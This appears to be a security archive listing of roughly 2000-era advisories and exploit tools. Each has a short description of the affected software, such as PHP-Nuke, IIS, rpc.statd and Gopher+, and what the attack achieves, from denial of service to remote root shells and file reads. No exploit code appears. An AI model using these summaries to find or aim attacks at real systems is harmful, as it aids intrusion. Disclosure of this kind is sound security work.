vqServer version 1.4.49 is vulnerable to a denial of service attack by sending a malformed URL request. Tested on Windows version. The latest edition of vqServer (1.9.47) is unaffected.
50488cee02fca807a8ce6e2060e9884bc802b907abd649fbdd372b9c7f8b7fae
Vigilante Advisory #7 - A malicious user can crash an Intel Express 550F or a host behind it by sending a packet with a malformed header. To restart the box you need remove it from it's power source as the reset button loses functionality as well. Affected systems: Intel Express Switch 550F - Firmware version 2.63 - Firmware version 2.64.
e5543dcadd99ee203a752f663a687366bd68f30736388f7036df6793e11c9e4c
Bubonic.c is a denial of service tool that sends random TCP packets with random settings. Tested against Windows 2000 and RedHat Zoot.
2013c97c64a142d7b60cf7fb0c87cfb2051a655e1a6bbacda27c715de28a58c4
Dameonic.c is a theoretical router based denial of service attack that exploits a weakness within the Border Gateway Protocol (BGP). If a malicious user sends spoofed malformed packets to a neighboring router, the peer will ignore it and possibly kill the session entirely. Written on a Ultra 5 running Linux Zoot, this has been compiled on Linux, OpenBSD, Solaris without problems.
087027be1ed28b34dfed0504b156c7b5365220433158b9462f5e771cc9c446cd
A short advisory on how to manipulate a bug in the PHP-nuke Web Portal System to allow you to gain administrative access.
cf5caaf8ca30d68549e8b03b403d8357b9091908f9a1f4a699adfa6d79dd6c90
USSR Labs Advisory #51 - There is a remote denial of service caused by a buffer overflow memory problem in the rpc module of the Pragma TelnetServer 2000 for Windows NT/2000. The included shell code causes the system to crash.
80aaff8dc2722ce8975dbf99700af93496577d3c0b91d5b96d636774b89c15f0
Darxite, a daemon that retrieves files via FTP or HTTP, has several vulnerabilities throughout the code that allow a local/remote user to crash the servers, as well as a passwd authentication remote overflow, allowing remote shell access as the uid of the darxite daemon. Exploit and advisory included. Tested against Linux x86 systems.
2c5a17a7af5e62b8c35d708754842d9f6d13efbcd99d19896e60c3d9ca6f3760
Slrnpull.c exploits a local buffer overflow vulnerability in slrnpull version 0.9.6.2, which is setgid news. Tested against RedHat 6.2.
416129da6ec1a149669dbfa4d033e8be06cf479f020fc5eefda50e6ade9d3fc9
A vulnerability in the way PHP-Nuke, a news site administrative tool, authenticates administrative accounts, allows a remote attacker to gain administrative access to the application. Attacker could edit users, articles, topics, banners, assign authors, etc
eca37faae9a6a2eeba44799294fae819f847c9d8cb2db5b49509a50b9b29c9ac
Htgrep has a vulnerability which allows a remote user to read arbitrary files on the system with the priviledge of the user running the program.
c01230dec2a91deb2f424d3380ac2843757db64552164f3d93bd6365f519b20b
Srcgrab.pl exploits the Translate:f bug as described in ms00-058. The vulnerability, present in IIS 4.0 and Windows 2000 Frontpage server extensions, allows a remote user to retrieve the source of .asa and .asp pages.
33424ecc3ff3c935dcbae09202091459045e94a6f7ba54fa540a7133c419705e
The ncftp client uses an easily decrypted scheme to save passwords to remote FTP sites in a bookmark file. Crackncftp.c provides the plaintext when from the encrypted string.
4ed56e4e5d88cc9b9c62d4ce74ab7b94bc9d98b285cadb58d0da304ceca15a9b
Georgi Guninski security advisory #18 - Two serious vulnerabilities have been found Microsoft products - Internet Explorer 5.5/5.x may execute arbitrary programs when visiting a web page, reading HTML based mail with Outlook, or simply browsing folders as web pages. In addition, the default installation of Windows 2000 allows Local Administrator compromise via opening local folders as web pages. In both cases a malicous person may take full control over user's computer / server. Includes proof of concept HTML code. Demonstration available here.
49fd86e3c8396e11f2d62291b0e07c00a9c7b972856156f9dac92627faf60f3b
RapidStream VPN nodes has hard-coded the 'rsadmin' account into the sshd binary in the appliance OS. The account has been given a 'null' password in which password assignment and authentication was expected to be handled by the RapidStream software itself. The vendor failed to realize that arbitrary commands could be appended to the ssh string when connecting to the SSH server on the remote vpn. This in effect could lead to many things, including the ability to spawn a remote root shell on the vpn.
1fd2ed25e75ae6103e367de4a012acaddbd2dec2b82709822d1d1f127d8cc413
Linsql is a simple command-line client for MS SQL server which can execute arbitrary SQL queries and OS commands on an MS-SQL hosts that uses a blank 'sa' password, a common default configuration.
8c9396b46daebd7ef569ec0f947a5ed309df55823876b48edcb9daffb8a5e521
Vigilante Security Advisory - The OS/2 Warp 4.5 FTP Server contains denial of service vulnerabilities which allow anyone who can connect to port 21 to crash the service. Fix available here.
dcb764dd372fa94bea264f25decd609cbc3da5a3d482b1c028224a0dfc38159b
Vigilante Security Advisory - Watchguard Firebox Authentication dos vulnerability. Sending a malformed URL to tcp port 4100 causes Watchguard to shut down and require a reboot to restart. Fix available here.
14919ca4948fe3696698e353b783188ead84c819a08b964e581bbb6c4dfa3cc0
Versions 3 and 4 of the Lyris List Manager allow any mailing list subscriber to gain access to the administrative interface of that list by changing a form before submitting it. Fix available here.
2f0b0f3203076a0c3be1376c0bf6a444c51fef60e897a936f0aedc04872cfb91
Form-Totaller version 1.0 (form-totaller.cgi) trusts user input for filenames, allowing a remote user to read any file on the webserver.
e3d777d52f8cfacde87ec258a2d6cfa48ba8b637c56c21835cdf716ee4620394
The Everything Form (everythingform.cgi) contains remote vulnerabilities which allow any file on the sytem to be read.
1b339106ce174c1887c0dbb63dc46ef3e2273e5d5d44fae56593ea21e2c22e12
The wais.pl CGI written by Tony Sanders provides means to access the waisq WAIS client via the webserver. Waisq contains buffer overflows allowing remote code execution which can be exploited via wais.pl. In addition, files owned by nobody on the webserver can be overwritten with arbitrary content. Includes exploit for Linux/x86.
0a1486af2061c3b2f7952eb470c47fcbf6d3d36571a036f046ae5709356c58d1
Gopher+ v2.3.1p0 remote exploit - Spawns a remote shell on tcp port 36864 under the UID that the gopher+ daemon runs as. Tested against Linux Slackware 3.6 / 7.0.
71aa58978ab9c730cefaa09803a9c98febeb91b69d9d601ac9a232b790ac1e41
Statistics Server 5.02x for Windows contains a buffer overflow caused by a long GET request. Includes perl exploit which spawns a winshell with system privileges on port 8008 on Statistics Server 5.02x/Win2k.
4d5eb9ffd94b406e9662e8575bcca3692763124371afe9b77e28d789f947712f
Redhat Linux rpc.statd remote buffer overflow exploit. Tested against Redhat 6.0, 6.1, and 6.2.
c1de1ba5c571d6f403a8f820e615faa4e5df066142935928a9f9d39804e2b53f
Gopher+ daemon v2.3 remote root buffer overflow exploit - Tested against Slackware Linux 3.6 and 7.0. Adds a line to /etc/passwd.
9c2f2d4a91a62e040ddd61ebd3561c42d0097168294f3951f1f9d91c91fab2e1